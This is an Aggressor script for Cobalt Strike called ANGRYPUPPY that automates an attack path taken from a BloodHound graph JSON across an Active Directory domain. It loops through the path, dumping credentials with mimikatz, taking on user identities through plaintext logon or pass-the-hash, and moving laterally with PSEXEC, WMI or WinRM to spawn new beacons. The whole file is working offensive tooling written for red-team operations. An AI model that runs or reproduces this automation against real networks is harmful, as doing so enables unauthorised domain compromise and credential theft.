ANGRYPUPPY.cna

# ANGRYPUPPY.cna
# Automate BloodHound attack path in Cobalt Strike
#
# Authors: Calvin Hedler (@001SPARTaN) and Vincent Yiu (@vysecurity)
#

# org.json from https://mvnrepository.com/artifact/org.json/json
# Documentation - https://stleary.github.io/JSON-java/
import org.json.* from: {{PATH}};
include(script_resource("cypher.cna"));
include(script_resource("utils.cna"));
#include(script_resource("com-exec.cna"));

global('@edges @nodes @final $waitFor $currentBid $nextLabel $True $False $attackActive $pos $listener $psexec $mimikatz $randomPuppy $machineNo $jsonFile $lateralMethod $realm $listenerChoice $operator');

# Parse BloodHound graph.json and add nodes
sub parseNodes {
    local('$json');
    $json = $1;

    # Create new JSONObject from string
    $obj = [new JSONObject: $json];

    # Create a new JSONArray from the "nodes" key
    $nodeArray = [new JSONArray: [$obj get: "nodes"]];

    # How many nodes?
    $length = [$nodeArray length];
    #println("Number of nodes: $length");

    # Iterate through all nodes and add to appropriate array
    for ($i = 0; $i < $length; $i++) {
        # Hash to store individual node information
        %node = %();

        # Get id, type, label fields from each node
        $id = [[$nodeArray get: $i] get: "id"];
        $type = [[$nodeArray get: $i] get: "type"];
        $label = [[$nodeArray get: $i] get: "label"];

        %node["id"] = $id;
        %node["label"] = $label;
        %node["type"] = $type;

        add(@nodes, %node, -1);
    }

#    foreach %node (@nodes) {
#        if (%node["type"] eq "Computer") {
#            println("Computer: " . %node["label"]);
#        }
#        else if (%node["type"] eq "User") {
#            println("User: " . %node["label"]);
#        }
#    }
}

# Parse BloodHound graph and add edges
sub parseEdges {
    local('$json');
    $json = $1;

    # Create new JSONObject from string
    $obj = [new JSONObject: $json];

    # Create new JSONArray from the "edges" key
    $edgeArray = [new JSONArray: [$obj get: "edges"]];

    # How many edges?
    $length = [$edgeArray length];
    #println("Number of edges: $length");

    for ($i = 0; $i < $length; $i++) {
        %edge = %();

        # Get id, label, source, target for each edge
        $id = [[$edgeArray get: $i] get: "id"];
        $label = [[$edgeArray get: $i] get: "label"];
        $source = [[$edgeArray get: $i] get: "source"];
        $target = [[$edgeArray get: $i] get: "target"];

        %edge["id"] = $id;
        %edge["label"] = $label;
        %edge["source"] = $source;
        %edge["target"] = $target;

        @edges[$i] = %edge;
        #println("Added edge: " . %edge);
    }
}

# Find the first node
# This will be a node that is the "source" for one edge,
# but is not a "target" for another edge
sub getFirstNode {
    local('@targets');

    foreach %edge (@edges) {
        add(@targets, %edge["target"]);
    }
    foreach %edge (@edges) {
        # If we find an edge with a source that isn't the target of another
        if (%edge["source"] !isin @targets) {
            foreach %node (@nodes) {
                # Find the corresponding node, this is the first
                if (%edge["source"] eq %node["id"]) {
                    #println("First node is: " . %node["id"]);
                    return %node;
                }
            }
        }
    }
}

# Get the node following %sourceNode
sub getNextNode {
    local('%sourceNode');
    %sourceNode = $1;

    # Find the edge with a source of %sourceNode["id"]
    foreach %edge (@edges) {
        if (%edge["source"] == %sourceNode["id"]) {
                foreach %node (@nodes) {
                    # Then find the node that that edge is targeting
                    if (%node["id"] == %edge["target"]) {
                        #println("Found next node: " . %node["id"]);
                        return %node;
                    }
                }
            }
    }
}

# Sort the nodes so that we can complete attack chain in order
sub sortNodes {
    local ('@sorted %firstNode $length');

    $length = size(@nodes);

    # Get the first node
    %firstNode = getFirstNode();

    # Add first node to the sorted array
    add(@sorted, %firstNode, 0);

    # Run getNextNode until we have all nodes
    for ($i = 1; $i < $length; $i++){
        %next = getNextNode(@sorted[-1]);
        add(@sorted, %next, -1);
    }

    # println("Sorted nodes: " . @sorted);

    return @sorted;
}

# We don't need group nodes because they don't give us actionable info
# user -(MemberOf)-> group -(AdminTo)-> system can be simplified as
# user -(AdminTo)-> system
sub removeGroups {
	@nodes = $1;

	foreach $i => $item (@nodes){
    	if ($item["type"] ne "Group"){
    		if ($item["type"] eq "User"){
                $realm = bhUserToDomain-sub($item["label"]);
    			$item["label"] = bhUserToCS-sub($item["label"]);
    		}
            else {
                $item["label"] = bhComputerToCS-sub($item["label"]);
            }
    		push(@final, $item);
    	}
    }

    return @final;
}

# Parse the BloodHound graph
sub parseGraph {
    local('$graph $json $file');
    $graph = $1;
    $file = openf($graph);

    while $line (readln($file)) {
        $json = $json . $line;
    }

    closef($file);

    # Parse nodes and edges
    parseNodes($json);
    parseEdges($json);

    # Sort nodes and edges
    @nodelist = sortNodes();

    # Remove unneeded group information
    @final = removeGroups(@nodelist);

}

# Make a token with the correct creds
sub getToken {
    # We got the set of credentials we need in the cred store, we want to grab it out now.

    $plaintext = $False;
    $hashes = $False;
    $realmFound = $False;

    # realm checks

    # For each cred in the database, check if it matches the user we want to make token for
    foreach $cred (credentials()){
        println("Comparing " . $cred["user"] . " vs. " . $nextLabel);
        # Check if password is hashed or plaintext
        if (($nextLabel eq uc($cred["user"])) && ($cred["password"] !ismatch "[0-9a-f]{32}") && ($cred["source"] eq "mimikatz") && (uc($cred["realm"])) eq uc($realm)) {
            # Current $Cred object 
            $targetCreds = $cred;
            $plaintext = $True;
            $realmFound = $True;
            break;
        }
    }

    if ($realmFound eq $False){
    # Plaintext found? If not, let's go for a look at finding hashes.
        if ($plaintext eq $False){
            foreach $cred (credentials()){
                if (($nextLabel eq uc($cred["user"])) && ($cred["source"] eq "mimikatz") && (uc($cred["realm"])) eq uc($realm)) {
                    # Current $Cred object 
                    $targetCreds = $cred;
                    $hashes = $True;
                    $plaintext = $False;
                    $realmFound = $True;
                    break;
                }
            }
        }
    }

    if ($realmFound eq $False){
        # For each cred in the database, check if it matches the user we want to make token for
        foreach $cred (credentials()){
            println("Comparing " . $cred["user"] . " vs. " . $nextLabel);
            # Check if password is hashed or plaintext
            if (($nextLabel eq uc($cred["user"])) && ($cred["password"] !ismatch "[0-9a-f]{32}") && ($cred["source"] eq "mimikatz")) {
                # Current $Cred object 
                $targetCreds = $cred;
                $plaintext = $True;
                break;
            }
        }
        # Plaintext found? If not, let's go for a look at finding hashes.
        if ($plaintext eq $False){
            foreach $cred (credentials()){
                if (($nextLabel eq uc($cred["user"])) && ($cred["source"] eq "mimikatz")) {
                    # Current $Cred object 
                    $targetCreds = $cred;
                    $hashes = $True;
                    $plaintext = $False;
                    break;
                }
            }
        }

    }

    if (($plaintext eq $True || $hashes eq $True) && (uc($targetCreds["user"]) eq $nextLabel)) {
        # All good to go
        # We have a plaintext or hash, so go ahead and get into context.
        $domain = $targetCreds["realm"];
        $user = $targetCreds["user"];
        $password = $targetCreds["password"];

        println("Domain: " . $domain);
        println("User: " . $user);
        println("Password: " . $password);
        brev2self($currentBid);
        if ($plaintext eq $True){
            # If it's plain text, bloginuser() makes a token for us
            println("Using PLAIN TEXT LOGIN");
            bloginuser($currentBid, $domain, $user, $password);
        }
        else {
            # Must be a password hash at this point, use pass the hash
            println("Using PASS THE HASH");
            bpassthehash($currentBid, $domain, $user, $password);
        }
        #bpause($currentBid, 5000);

        $pos = $pos + 1;
        $mimikatz = $False;
    }
    else{
        println("Credentials are not found in credential store for the target");
    }
}

# Perform a lateral movement action based on method selected
sub lateralMove {
    #PSEXEC here
    if ($psexec eq $False){
    	if ($lateralMethod eq "PSEXEC_PSH"){
    		btask($currentBid, "PSEXEC_PSH to $nextLabel");
        	bpsexec_psh($currentBid, $nextLabel, $listener);
        }
        else if ($lateralMethod eq "WMI"){
        	btask($currentBid, "WMI to $nextLabel");
        	bwmi($currentBid, $nextLabel, $listener);
        }
        else if ($lateralMethod eq "WINRM"){
        	btask($currentBid "WINRM to $nextLabel");
        	bwinrm($currentBid, $nextLabel, $listener);
        }
        else if ($lateralMethod eq "PSEXEC"){
        	btask($currentBid, "PSEXEC to $nextLabel");
        	bpsexec($currentBid, $nextLabel, $listener, "ADMIN\$");
        }
        #else {
       # 	#COMEXEC
       # 	btask($currentBid, "COMEXEC to $nextLabel");
       # 	com_exec_go($currentBid, $nextLabel, $listener);
       # }

        $psexec = $True;
        #bpause($1, 10000);
        bstage($1, $null, $listener);
    }

    if ($waitFor eq $nextLabel) {
        # We got the beacon back and change the bid to the new one
        foreach $session (beacons()) {
            $comp = $session["computer"];
            $note = $session["note"];
            if (($comp eq $nextLabel) && ($note eq "ANGRYPUPPY" . $randomPuppy . " - " . ($machineNo))) {
                $currentBid = $session["id"];
                break;
            }
        }
        if (uc(binfo($currentBid,"computer")) eq $nextLabel){
            # All good to go
            $pos = $pos + 1;
            $psexec = $False;

        }
    }
    else if ($waitFor ne "") {
        # Error occured, let's reset waitFor
        $waitFor = "";
        println("Error: WaitFor override with wrong beacon");
    }
}

# Execute primary attack logic loop
sub executeAttack {
    println("[*] Executing after 5s");
    # Ignore current node 0 as it's the first node and our machine. So loop all the way to the end.
    $next = @final[$pos + 1];
    $nextLabel = uc($next["label"]);

    if (@final[$pos + 1]["type"] eq "Computer"){
        println("[LATERAL] : $nextLabel");

        lateralMove();

    }
    else {
        println("[MIMIKATZ]: $nextLabel");

        # At this point we already know we have a COMPUTER sesssion going, with SYSTEM, so we can just scrape the credentials.
        # If all works fine, $currentBid contains the machine we are working on and should be scraping creds from

        # MIMIKATZ HERE

        println("Mimikatz: " . $mimikatz);
        println("Wait For: " . $waitFor);
        println("Next Label: " . $nextLabel);

        if ($mimikatz eq $False) {
            blogonpasswords($currentBid);
            $mimikatz = $True;
            $waitFor = "";
            #bpause($currentBid, 5000);
        }

        if ($waitFor eq $nextLabel) {
            getToken();
        }
        else if ($waitFor ne "") {
            println("Error: WaitFor override with wrong credentials");
            println($waitFor . " vs. " . $nextLabel);
        }
    }
    if ($pos eq (size(@final) - 1)){
        # Finished attack path

        elog("[*] Attack finished: $randomPuppy");
        $attackActive = $False;
    }
}

sub apGUI {
    $bid = $1;


    $dialog = dialog("ANGRYPUPPY", %(jsonFile => $jsonFile, listenerChoice => $listenerChoice, lateralMethod => $lateralMethod), lambda({
        # save config
        $jsonFile = $3['jsonFile'];
        $listenerChoice = $3['listenerChoice'];
        $lateralMethod = $3['lateralMethod'];

        if ($2 eq 'Run'){
            @final = @();
            @nodes = @();
            @edges = @();

            $path = $jsonFile;
            $path = strrep($path, "\\", "/");
            $path = strrep($path, "C:", "");
            println($path);

            parseGraph($jsonFile);

            angryPuppy();
        }
                                                                                                                                        }));

    dialog_description($dialog, "Specify the JSON attack path file, listener to use and lateral movement method");
    drow_file($dialog, "jsonFile", "JSON File: ");
    drow_listener_stage($dialog, "listenerChoice", "Listener: ");
    drow_combobox($dialog, "lateralMethod", "Lateral Movement: ", @("PSEXEC_PSH", "WMI","WINRM", "PSEXEC")); #"COMEXEC"

    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Cancel");
    dialog_show($dialog);
}

sub angryPuppy {
    # Set currentBid to first node
    # If Start node is a computer

    if (@final[0]["type"] eq "Computer"){
        println("First computer detected [!!!]");
        $cLabel = @final[0]["label"];
        foreach $session (beacons()) {
            if ($cLabel eq $session["computer"]) {
                $currentBid = $session["id"];
            }
        }
    }
    else{
        println("First user detected [!!!]");
        # Start node is a user
        $uLabel = uc(@final[0]["label"]);
        println($uLabel);
        foreach $session (beacons()) {
            println($uLabel . " vs ". uc($session["user"]));
            if ($uLabel eq uc($session["user"])) {
                $currentBid = $session["id"];
            }
        }
    }

    foreach %a (@final){
        if (%a["type"] eq "Computer"){
            println("PSEXEC to " . %a["label"]);
        }
        else{
            println("Mimikatz for " . %a["label"]);
        }
    }


    $AttackActive = $False;

    # $currentBid is now the start node.

    # PROMPT WHAT LISTENER TO USE

    #openPayloadHelper(lambda({
    #    $listener = $1;
    #    $psexec = $False;
    #    $mimikatz = $False;
    #    @rSet = @("a","b","c","d","e","f","0","1","2","3","4","5","6","7","8","9");
#
    #    $rString = "";
    #    for ($x = 0; $x lt 7; $x++){
    #        $rString = $rString . rand(@rSet);
    #    }
#
    #    $randomPuppy = "[". $rString . "]";
#
    #    # Reset waitFor
    #    $waitFor = "";
    #    $machineNo = 0;
#
    #    $attackActive = $True;
    #    elog("[*] ANGRYPUPPY activated: $randomPuppy");
#
    #    $pos = 0;
    #}, $bids => $1));


    $listener = $listenerChoice;

    $psexec = $False;
    $mimikatz = $False;
    @rSet = @("a","b","c","d","e","f","0","1","2","3","4","5","6","7","8","9");

    $rString = "";
    for ($x = 0; $x lt 7; $x++){
        $rString = $rString . rand(@rSet);
    }
    $randomPuppy = "[". $rString . "]";

    # Reset waitFor
    $waitFor = "";
    $machineNo = 0;

    $attackActive = $True;
    elog("[*] ANGRYPUPPY activated by $operator" . ": $randomPuppy");
    elog("[*] Using $lateralMethod");
    elog("[*] CurrentBid is $currentBid");

    $pos = 0;
}

on heartbeat_1s{
    if ($attackActive eq $True){
        executeAttack();
    }	# End $AttackActive
}

on beacon_input {
    if ($3 eq "angrypuppy") {
        $operator = $2;
    }
}

alias angrypuppy {
	apGUI($1);
}

alias angrypuppykill {
	$attackActive = $False;
}

$True = "True";
$False = "False";
#$attackActive = $False;

popup attacks {
    item "ANGRYPUPPY" {
        apGUI();
    }
    item "Stop ANGRYPUPPY" {
        $attackActive = $False;
    }
}